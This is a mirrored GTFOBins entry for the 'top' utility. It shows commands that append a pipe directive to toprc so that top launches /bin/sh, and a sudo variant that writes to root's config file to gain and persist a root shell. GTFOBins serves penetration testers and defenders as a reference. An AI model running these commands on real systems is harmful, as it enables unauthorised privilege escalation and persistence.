mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 23:09:46 +01:00
236f88cd34
Related #81.
18 lines
655 B
Markdown
18 lines
655 B
Markdown
---
|
|
description: This requires that an existing configuration file is present, to create one run `top` then type `Wq`. Note down the actual configuration file path and use it in the below examples.
|
|
functions:
|
|
shell:
|
|
- code: |
|
|
echo -e 'pipe\tx\texec /bin/sh 1>&0 2>&0' >>~/.config/procps/toprc
|
|
top
|
|
# press return twice
|
|
reset
|
|
sudo:
|
|
- description: This requires that the root configuration file is writable and might be used to persist elevated privileges.
|
|
code: |
|
|
echo -e 'pipe\tx\texec /bin/sh 1>&0 2>&0' >>/root/.config/procps/toprc
|
|
sudo top
|
|
# press return twice
|
|
reset
|
|
---
|